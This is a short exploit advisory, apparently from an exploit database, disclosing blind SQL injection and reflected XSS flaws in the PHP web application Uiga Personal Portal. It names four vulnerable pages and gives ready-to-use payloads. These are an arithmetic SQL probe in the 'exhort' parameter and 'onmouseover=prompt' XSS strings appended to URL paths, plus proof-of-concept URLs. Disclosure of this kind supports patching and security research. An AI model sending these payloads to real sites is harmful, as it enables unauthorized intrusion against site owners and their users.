Uiga Personal Portal - Multiple Vulnerabilities

Author: Eyup CELIK
type: webapps
platform: php
port: 
date_added: 2011-10-20 
date_updated: 2011-10-20 
verified: 1 
codes: OSVDB-83429;OSVDB-83428;OSVDB-83427;OSVDB-83426 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Uiga Personal Portal Multiple Vulnerability
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr


ISSUE

Blind SQL Injection and XSS can be done using the command input

Vulnerable Page:
index.php
cart.php
includes/photoview.php
index2.php

Example:
index.php?exhort=%24<Blind SQL Injection Code>&view=ar_det
cart.php/<XSS Code>
includes/photoview.php/<XSS Code>
index2.php/<XSS Code>


Exploit:
index.php?exhort=%2440-2+2*3-6&view=ar_det
cart.php/"onmouseover=prompt(955787)>
includes/photoview.php/"onmouseover=prompt(955787)>
index2.php/"onmouseover=prompt(955787)>


POC:
127.0.0.1/uigaportal/index.php?exhort=%2440-2+2*3-6&view=ar_det
127.0.0.1/uigaportal/cart.php/%22onmouseover=prompt(955787)%3E